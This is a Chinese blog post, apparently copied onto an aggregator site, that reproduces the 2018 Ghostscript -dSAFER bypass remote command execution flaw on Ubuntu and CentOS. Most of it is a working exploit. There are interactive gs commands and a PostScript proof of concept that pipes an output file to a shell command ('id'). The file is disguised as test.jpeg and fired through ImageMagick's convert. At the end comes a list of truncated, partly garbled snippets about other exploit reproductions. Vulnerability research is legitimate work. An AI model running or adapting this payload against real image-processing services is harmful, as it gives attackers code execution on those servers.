2. 程式人生 > >ghostscript 遠程命令執行漏洞復現

ghostscript 遠程命令執行漏洞復現

阿新 發佈:2018-08-23
dict 依次 tro ict 影響 漏洞 命令執行漏洞 .com put

影響的版本 <= 9.23(全版本、全平臺)

Ubuntu

開啟 ghostscript

sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次輸入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

執行結果

技術分享圖片

poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

用 vim 將 poc 保存為 test.jpeg,執行

sch01ar@ubuntu:~$ convert test.jpeg 1.jpg

執行結果,1.jpg 隨便寫

技術分享圖片

Centos 7

開啟 ghostscript

[root@sch01ar ~]# gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次輸入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

執行結果

技術分享圖片

poc

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

ghostscript 遠程命令執行漏洞復現

相關推薦

ghostscript 命令執行漏洞復現

dict 依次 tro ict 影響 漏洞 命令執行漏洞 .com put 影響的版本 <= 9.23(全版本、全平臺) Ubuntu 開啟 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFE

【知道創宇404實驗室】Oracle WebLogic命令執行漏洞預警

watermark 引擎 應急 序列 day 雲安全 oss 相關 mark 2019年04月17日,國家信息安全漏洞共享平臺(CNVD)官方發布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 稱Oracle WebLogic w

漏洞復現——Apache SSI命令執行

ssi bsp 生成 頁面 info 程序 正常 遠程 技術 漏洞原理:當目標服務器開啟了SSI與CGI支持,我們就可以上傳shtml文件,利用<!--#exec cmd="id" -->語法執行命令。 SSI:SSI(服務器端包含)是??放置在HTML頁面中

Tomcat CVE-2017-12615 上傳漏洞復現

pan 技術分享 port style 運行 下載鏈接 imp put tom 漏洞名稱:CVE-2017-12615-遠程代碼執行漏洞 CVE-2017-12615:遠程代碼執行漏洞 當 Tomcat運行在Windows操作系統時,且啟用了HTTP PUT請求方法(例

Zabbix命令執行失敗

serve include level 我們 cto centos 7 trap call ice 前言 問題 : 手機上收到tomcat server【80】 down信息,服務down掉,往往都是有重啟操作。重啟失敗才會報警。如果重啟操作執行了,我們就需要查看為何不能

ThinkPHP 5.x 遠端命令執行漏洞復現(GetShell)

注:轉載請註明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、簡介 ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒

ThinkPHP 遠端命令執行漏洞復現(GetShell)

漏洞概況 ThinkPHP是一款國內流行的開源PHP框架,近日被爆出存在可能的遠端程式碼執行漏洞,攻擊者可向快取檔案內寫入PHP程式碼,導致遠端程式碼執行。雖然該漏洞利用需要有幾個前提條件,但鑑於國內使用ThinkPHP框架的站點數量之多,該漏洞還是存在一定的影響範圍。由於框架對控制器名沒有

WebLogic命令執行

17. localhost 1.8 coord 14. lcs 簡單 pow 一個地方 靶機說明 目標ip:172.16.53.28(window 2003) 本靶機所針對的序列化漏洞系列以及常見安全問題如下: 弱口令登陸控制臺部署war包webshell CVE-20

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

## 一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞,攻擊者可以注入惡意

ghostscript代碼執行漏洞復現

centos7 gate ibm batch otl htm 報錯 驗證 分享 這兩天網上ghostscript又又有漏洞信息了,但是沒有poc,於是找找資料把今年8月21日的那個驗證下 1、關於ghostscript Ghostscript是一套建基於Adobe、Post

LNK文件(快捷方式)代碼執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

Office CVE-2017-8570代碼執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Office CVE-2017-8570 代碼執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

St2-057代碼執行漏洞復現過程

noop tasks res tar legacy roo struts 2 pri err 0x01 搭建環境docker https://github.com/vulhub/vulhub/tree/master/struts2/s2-048 docker-compos

ECShop全系列版本代碼執行漏洞復現

eval 解析變量 width xtra assert attr 執行 assign select 前言 問題發生在user.php的display函數,模版變量可控,導致註入,配合註入可達到遠程代碼執行 漏洞分析 0x01-SQL註入 先看user.php $bac

zabbix執行命令

最大的 好處 ebo proxy 系統 init.d tar pass 不能 Remote command 最大的好處是什麽呢? 是自動。 Zabbix會根據配置的條件,去執行對應的命令,下面看看Remote command的應用場景。 應用無法響應時,自動重啟某些應

CVE-2017-8464復現快捷方式漏洞

遠程 們的 apach bject nom nbsp windows pre mage 我們的攻擊機IP是192.168.222.133   目標機IP是192.168.222.132 我們首先生成一個powershell msfvenom -p windows/x64/m

WordPress <= 4.6 命令執行漏洞(PHPMailer)復現分析

inux 支持 rpo with rec program 遇到 other n) 漏洞信息 WordPress 是一種使用 PHP 語言開發的博客平臺,用戶可以在支持 PHP 和 MySQL 數據庫的服務器上架設屬於自己的網站。也可以把 WordPress 當作一個內容管理

模擬SSH執行命令的編解碼說明

ESS port bytes 產生 方法 客戶端 lose bre connect   模擬一個SSH“遠程”執行命令並獲取命令結果的一個程序:   1、在C/S架構下,當客戶端與服務器建立連接(這裏以TCP為例)後,二者可以不斷的進行數據交互。SSH遠程可以實現的效果是客

ssh執行命令和bash -c string的用法

sign -m sla mysql conf follow exit ash hub ssh執行遠程命令和bash -c string的用法說明:今天在學習k8s的Run a Replicated Stateful Application (運行一個有狀態應用的副本)時,官